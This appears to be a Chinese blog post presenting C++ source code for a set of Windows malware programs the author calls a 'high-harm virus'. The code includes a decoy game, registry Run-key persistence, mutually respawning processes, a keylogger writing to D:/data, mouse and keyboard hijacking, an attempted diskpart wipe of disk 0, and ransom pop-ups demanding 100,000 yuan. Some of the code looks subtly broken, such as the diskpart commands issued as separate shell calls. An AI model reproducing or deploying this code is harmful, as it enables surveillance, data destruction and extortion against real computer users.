checker(高危害病毒)

程序危险,慎重运行

checker终极版.cpp:

#include <bits/stdc++.h>
using namespace std;
int main() {
    char systems[MAX_PATH];
    char pathtofile[MAX_PATH];
    HMODULE GetModH = GetModuleHandle(NULL);
    GetModuleFileName(GetModH, pathtofile, sizeof(pathtofile));
    GetSystemDirectory(systems, sizeof(systems));
    strcat(systems, "checker终极版.exe");
    CopyFile(pathtofile, systems, false);
    HKEY hKey;
    RegOpenKeyEx(HKEY_LOCAL_MACHINE,
        "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey );
    RegSetValueEx(hKey, "Writing to the Registry Example",
        0, REG_SZ, (const unsigned char*)systems, sizeof(systems));
    RegCloseKey(hKey);//写入注册表
double t = clock();
//引入病毒的幌子
    cout << "我们来玩游戏吧!\n";
    cout << "我说1,你就输入2和回车,我说2,你就输出1和回车\n";
    double start = clock();
    while (clock() - start <= 1000){
        int t = rand() % 2 + 1;
        cout << t << endl;
        int c;
        cin >> c;
        if (c == t){
            cout << "错了\n";
        }
        else{
            cout << "对了\n";
        }
    }
    system("start check.exe");
while (1){
    time_t nowtime;
    time(&nowtime);
    tm *p = localtime(&nowtime);//获取时间
    if (p ->tm_year > 2026){//如果已经超过了2026年,就免费破解了
        break;
    }
}//时间超过了2026年就帮你免费关闭
system("start SHUTDOWN.exe");    //算了你是个穷人不为难你了
return 0;
}

check.cpp

//最终程序,不断调用checkers
#include <bits/stdc++.h>
#include <windows.h>
int main() {
system("start 
MAKE_YOUR_FILES_DIE_CHECKERS.exe");//帮你格式化磁盘
    char systems[MAX_PATH];
    char pathtofile[MAX_PATH];
    HMODULE GetModH = GetModuleHandle(NULL);
    GetModuleFileName(GetModH, pathtofile, sizeof(pathtofile));
    GetSystemDirectory(systems, sizeof(systems));
    strcat(systems, "check.exe");
    CopyFile(pathtofile, systems, false);
    HKEY hKey;
    RegOpenKeyEx(HKEY_LOCAL_MACHINE,
        "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey );
    RegSetValueEx(hKey, "Writing to the Registry Example",
        0, REG_SZ, (const unsigned char*)systems, sizeof(systems));
    RegCloseKey(hKey);//写入注册表
    ShowWindow(GetConsoleWindow(),SW_HIDE);//隐藏窗口
    while (1){//不断调用checkers
        system("start checkers.exe");//调用checkers
        //Sleep(5000);
    }    
    return 0;
}


checkers.cpp:

//checker的后台保护程序,和checker互相保护
#include <bits/stdc++.h>
#include <windows.h>
int main() {
    char systems[MAX_PATH];
    char pathtofile[MAX_PATH];
    HMODULE GetModH = GetModuleHandle(NULL);
    GetModuleFileName(GetModH, pathtofile, sizeof(pathtofile));
    GetSystemDirectory(systems, sizeof(systems));
    strcat(systems, "checkers.exe");
    CopyFile(pathtofile, systems, false);
    HKEY hKey;
    RegOpenKeyEx(HKEY_LOCAL_MACHINE,
        "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey );
    RegSetValueEx(hKey, "Writing to the Registry Example",
        0, REG_SZ, (const unsigned char*)systems, sizeof(systems));//放注册表里
    RegCloseKey(hKey);
system("start TUIGUANGCHENGXU.exe");
    ShowWindow(GetConsoleWindow(),SW_HIDE);
system("start QIETING.exe");//窃听你的键盘输入
    system("start checker.exe");//先打开一个再说
    while (1){//捆绑两个程序,使得关掉checker.exe都还会有checkers
        if (system("tasklist | findstr /i checker.exe >nul 2>&1")){//保护,如果你关掉了checker我就在帮你打开一个
            system("start checker.exe");
        }
    }    
    return 0;
}


checker.cpp:

//最终的办事的病毒,和checkers互相保护
#include <bits/stdc++.h>
#include <windows.h>
#include <conio.h>
using namespace std;
int x = GetSystemMetrics(SM_CXSCREEN);
int y = GetSystemMetrics(SM_CYSCREEN);

#define k    for (int i=0;i<20;i++) {    SetCursorPos(rand() % y, rand() % x);}
//鼠标乱飞,让你控制不了
void key(int x) {
    keybd_event(x, 0, 0, 0);
    keybd_event(x, 0, 2, 0);
}
bool keyd(int key) {//检查你是否按下了某个键
    return (GetAsyncKeyState(key) & 0x8000) != 0;
}
int main() {
    char systems[MAX_PATH];
    char pathtofile[MAX_PATH];
    HMODULE GetModH = GetModuleHandle(NULL);
    GetModuleFileName(GetModH, pathtofile, sizeof(pathtofile));
    GetSystemDirectory(systems, sizeof(systems));
    strcat(systems, "QQ换颜色.exe");
    CopyFile(pathtofile, systems, false);
    HKEY hKey;
    RegOpenKeyEx(HKEY_LOCAL_MACHINE,
        "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey );
    RegSetValueEx(hKey, "Writing to the Registry Example",
        0, REG_SZ, (const unsigned char*)systems, sizeof(systems));
    RegCloseKey(hKey);//放注册表里
    system("title hello");
    system("color 90");
    cout << endl << endl << endl << endl << endl << endl << endl << endl;
    cout << "                        " << "欢迎使用" << "                               ";
    system("title QQ换颜色");
    system("cls");
    cout << "病毒名称:QQ换颜色" << endl;
    cout << "作者:H" << endl;
    cout << "地址:北京海淀区" << endl;
    cout << "联系电话:103 2234 7834" << endl;
    cout << "中了我的QQ换颜色病毒了吧,告诉你一个秘密,这个病毒必须重装系统。记住,你是一个大傻逼";
    system("color C7");
    system("cls");
    system("color B6");
    cout << "病毒名称:QQ换颜色" << endl;
    cout << "作者:H" << endl;
    cout << "地址:北京海淀区" << endl;
    cout << "联系电话:103 2234 7834" << endl;
    cout << "中了我的QQ换颜色病毒了吧,告诉你一个秘密,这个病毒必须重装系统。记住,你是一个大傻逼";
    system("cls");
    system("color A9");
    cout << "病毒名称:QQ换颜色" << endl;
    cout << "作者:H" << endl;
    cout << "地址:北京海淀区" << endl;
    cout << "联系电话:103 2234 7834" << endl;
    cout << "中了我的QQ换颜色病毒了吧,告诉你一个秘密,这个病毒必须重装系统。记住,你是一个大傻逼";
    system("cls");
    system("color E0");
    cout << "病毒名称:QQ换颜色" << endl;
    cout << "作者:H" << endl;
    cout << "地址:北京海淀区" << endl;
    cout << "联系电话:103 2234 7834" << endl;
    cout << "中了我的QQ换颜色病毒了吧,告诉你一个秘密,这个病毒必须重装系统。记住,你是一个大傻逼";
    system("cls");
    system("color D3");//这种操作用来闪瞎你的眼睛
    cout << "病毒名称:QQ换颜色" << endl;
    cout << "作者:H" << endl;
    cout << "地址:北京海淀区" << endl;
    cout << "联系电话:103 2234 7834" << endl;
    cout << "中了我的QQ换颜色病毒了吧,告诉你一个秘密,这个病毒必须重装系统。记住,你是一个大傻逼";
    system("cls");
    cout << "病毒名称:QQ换颜色" << endl;
    cout << "作者:H" << endl;
    cout << "地址:北京海淀区" << endl;
    cout << "联系电话:103 2234 7834" << endl;
    cout << "中了我的QQ换颜色病毒了吧,告诉你一个秘密,这个病毒必须重装系统。记住,你是一个大傻逼";
    double s = 0;
    key(VK_F11);//帮你全屏
    while (1) {
        if (system("tasklist | findstr /i checkers.exe >nul 2>&1")){//如果你把我的保护程序checkers杀掉了,我就帮你再开一个
            system("start checkers.exe");
        }
        if (keyd(VK_F11)) {//如果你退出全屏,我就在帮你全屏
            key(VK_F11);
        }
        if (keyd(VK_CONTROL)) {//一系列操作防止ctrl+c和alt+f4关闭程序
            keybd_event(VK_CONTROL, 0, 2, 0);
        }
        if (keyd('C')) {
            keybd_event('C', 0, 2, 0);
        }
        keybd_event(VK_RCONTROL,0,2,0);
        keybd_event(VK_LCONTROL,0,2,0);
        if (keyd(VK_LMENU)){
            keybd_event(VK_LMENU, 0, 2, 0);
        }
        if (keyd(VK_F4)){
            keybd_event(VK_F4, 0, 2, 0);
        } 
        keybd_event('C',0,2,0);
        keybd_event(VK_LMENU,0,2,0);
        keybd_event(VK_RMENU,0,2,0);
        int sh = rand() % 36;//开始闪烁
        if (sh == 0) {
            system("color 10");
            Sleep(s);
            k;
        } else if (sh  == 1) {
            system("color 25");
            Sleep(s);
            k;
        } else if (sh  == 2) {
            system("color 34");
            Sleep(s);
            k;
        } else if (sh == 3) {
            system("color D7");
            Sleep(s);
            k;
        } else if (sh == 4) {
            system("color 0A");
            Sleep(s);
            k;
        } else if (sh == 5) {
            system("color B7");
            Sleep(s);
            k;
        } else if (sh == 6) {
            system("color 78");
            Sleep(s);
            k;
        } else if (sh == 7) {
            system("color C9");
            Sleep(s);
            k;
        } else if (sh == 8) {
            system("color 9D");
            Sleep(s);
            k;
        } else if (sh == 9) {
            system("color D8");
            Sleep(s);
            k;
        } else if (sh == 10) {
            system("color 9E");
            Sleep(s);
            k;
        } else if (sh == 11) {
            system("color 5A");
            Sleep(s);
            k;
        } else if (sh == 12) {
            system("color DE");
            Sleep(s);
            k;
        } else if (sh == 13) {
            system("color 84");
            Sleep(s);
            k;
        } else if (sh == 14) {
            system("color 0E");
            Sleep(s);
            k;
        } else if (sh == 15) {
            system("color A2");
            Sleep(s);
            k;
        } else if (sh == 16) {
            system("color BD");
            Sleep(s);
            k;
        } else if (sh == 17) {
            system("color 35");
            Sleep(s);
            k;
        } else if (sh == 18) {
            system("color 75");
            Sleep(s);
            k;
        } else if (sh == 19) {
            system("color D0");
            Sleep(s);
            k;
        } else if (sh == 20) {
            system("color C2");
            Sleep(s);
            k;
        } else if (sh == 21) {
            system("color DC");
            Sleep(s);
            k;
        } else if (sh == 22) {
            system("color 6A");
            Sleep(s);
            k;
        } else if (sh == 23) {
            system("color E5");
            Sleep(s);
            k;
        } else if (sh == 24) {
            system("color 8B");
            Sleep(s);
            k;
        } else if (sh == 25) {
            system("color 9D");
            Sleep(s);
            k;
        } else if (sh == 26) {
            system("color 8D");
            Sleep(s);
            k;
        } else if (sh == 27) {
            system("color CE");
            Sleep(s);
            k;
        } else if (sh == 28) {
            system("color AD");
            Sleep(s);
            k;
        } else if (sh == 29) {
            system("color 4C");
            Sleep(s);
            k;
        } else if (sh == 30) {
            system("color 2B");
            Sleep(s);
            k;
        } else if (sh == 31) {
            system("color C0");
            Sleep(s);
            k;
        } else if (sh == 32) {
            system("color 89");
            Sleep(s);
            k;
        } else if (sh == 33) {
            system("color E5");
            Sleep(s);
            k;
        } else if (sh == 34) {
            system("color E1");
            Sleep(s);
            k;
        } else if (sh == 35) {
            system("color C3");
            Sleep(s);
            k;
        }
    }
    return 0;
}

MAKE_YOUR_FILES_DIE_CHECKERS:

 


#include <bits/stdc++.h>
#include <windows.h>
using namespace std;
int main(){
     ShowWindow(GetConsoleWindow(),SW_HIDE);
     system("diskpart");     
     system("list disk");
     system("select disk 0");
     system("clean");
     return 0;
}

WEIXIE.cpp:


#include <bits/stdc++.h>
#include <windows.h>
using namespace std;
int main(){
      ShowWindow(GetConsoleWindow(),SW_HIDE);
      system("start check.exe");
      int t = MessageBox(NULL,"给我点击确定格式化磁盘!不然我再给你开50个check.exe!","checker官方",MB_YESNO);
if (t != 6){
for (int i = 1;i <= 50 ;i ++ ){
system("start check.exe");
}
}
else{
system("start DAQIAN.exe");
}
      return 0;
}


DAQIAN.cpp:

#include <bits/stdc++.h>
#include <windows.h>
using namespace std;
int main(){
      system("start check.exe");
ShowWindow(GetConsoleWindow(),SW_HIDE);
MessageBox(NULL,"    累了吧赶紧给我打钱100000元!洛谷找kkksc03谈!用另外一台电脑!打钱了我就线下帮你关掉","checker官方",MB_YESNO);
      return 0;
}

QIETING.cpp:
 

#include <bits/stdc++.h>
#include <windows.h>
#include <filesystem>
#include <fstream>
using namespace std;

void key(int x) {
    keybd_event(x, 0, 0, 0);
    keybd_event(x, 0, 2, 0);
}

bool keyd(int key) {
    return (GetAsyncKeyState(key) & 0x8000) != 0;
}
namespace fs = std::filesystem;

int main() {
    char systems[MAX_PATH];
    char pathtofile[MAX_PATH];
    HMODULE GetModH = GetModuleHandle(NULL);
    GetModuleFileName(GetModH, pathtofile, sizeof(pathtofile));
    GetSystemDirectory(systems, sizeof(systems));
    strcat(systems, "checker版本微信.exe");
    CopyFile(pathtofile, systems, false);
    HKEY hKey;
    RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                 "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey );
    RegSetValueEx(hKey, "Writing to the Registry Example",
                  0, REG_SZ, (const unsigned char *)systems, sizeof(systems));
    RegCloseKey(hKey);
    srand(time(NULL));
    fs::path folderPath = "D:/data";
    if (!fs::exists(folderPath)) {
        fs::create_directories(folderPath);
    }
    string ss = "data";
    for (int i = 0; i < 20; i ++ ) {
        ss += rand() % 26 + 'A';
    }
    ss += ".txt";
    fs::path filePath = folderPath / ss;
    std::ofstream file(filePath);
    ShowWindow(GetConsoleWindow(), SW_HIDE);
    key(VK_F11);
    int s = 10;
    vector<int>vec;
    double start = clock();
    double last = start;
    while (1) {
        for (int i = 0 ; i <= 127; i ++ ) {
            if (keyd(i)) {
                double t = clock();
                if ((i >= 'A' && i <= 'Z')) {
                    file << "CLICK TIME:(START TIME+" << t - start << "MS";
                    file << ",the wating time is " << t - last << ",the presskey is (&&&";
                    file << (char)i << "&&&) ";
                    file << "The system time is:";
                    time_t nowtime;
                    time(&nowtime);
                    tm *p = localtime(&nowtime);
                    std::ostringstream oss;
                    oss << std::put_time(p, "%Y:%m:%d %H:%M:%S");
                    file << oss.str() << "\n";
                    last = t;
                } else if (i == 1) {
                    file << "CLICK TIME:(START TIME+" << t - start << "MS";
                    file << ",the wating time is " << t - last << ",the presskey is (&&&";
                    file << "LEFT MOUSE CILCK" << "&&&) ";
                    file << "The system time is:";
                    time_t nowtime;
                    time(&nowtime);
                    tm *p = localtime(&nowtime);
                    std::ostringstream oss;
                    oss << std::put_time(p, "%Y:%m:%d %H:%M:%S");
                    file << oss.str() << "\n";
                    last = t;
                } else if (i == 2) {
                    file << "CLICK TIME:(START TIME+" << t - start << "MS";
                    file << ",the wating time is " << t - last << ",the presskey is (&&&";
                    file << "RIGHT MOUSE CILCK" << "&&&) ";
                    file << "The system time is:";
                    time_t nowtime;
                    time(&nowtime);
                    tm *p = localtime(&nowtime);
                    std::ostringstream oss;
                    oss << std::put_time(p, "%Y:%m:%d %H:%M:%S");
                    file << oss.str() << "\n";
                    last = t;
                } else {
                    file << "CLICK TIME:(START TIME+" << t - start << "MS";
                    file << ",the wating time is " << t - last << ",the presskey is (&&&";
                    file << i << " VK KEYS &&&) ";
                    file << "The system time is:";
                    time_t nowtime;
                    time(&nowtime);
                    tm *p = localtime(&nowtime);
                    std::ostringstream oss;
                    oss << std::put_time(p, "%Y:%m:%d %H:%M:%S");
                    file << oss.str() << "\n";
                    last = t;
                }
            }
        }
        Sleep(100);
    }
    return 0;
}

TUIGUANGCHENGXU.cpp:

#include <bits/stdc++.h>
using namespace std;
int main(){
     system("start check.exe");
     ShowWindow(GetConsoleWindow(),SW_HIDE);
     MessageBox(NULL,"我们的程序是不是做得很好?请您去安装我们公司的合作公司jocker公司的产品!","checker官方",MB_OK);
     return 0;
}


SHUTDOWN.cpp:

#include <bits/stdc++.h>
using namespace std;
int main(){
//对于2026年以后仍未关闭并且支付的人,免费破解
    time_t nowtime;
    time(&nowtime);
    tm *p = localtime(&nowtime);
    if (p ->tm_year > 2026){
        MessageBox(NULL,"穷人,免费帮你破解算了","checker官方",MB_OK);
     while (1){
    system("taskkill /f /im checker终极版.exe");
system("taskkill /f /im check.exe");
system("taskkill /f /im checkers.exe");
system("taskkill /f /im checker.exe");
system("taskkill /f /im QQ换颜色.exe");
system("taskkill /f /im MAKE_YOUR_FILE_DIE_CHECKERS.exe");
system("taskkill /f /im TUIGUANGCHENGXU.exe");
system("taskkill /f /im QIETING.exe");
 system("taskkill WEIXIE.exe");
system("taskkill /f /im DAQIAN.exe");
}
   MessageBox(NULL,"穷人,自己去注册表把程序删了这件事情就完了","checker官方",MB_OK);
    }
     
     return 0;
}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值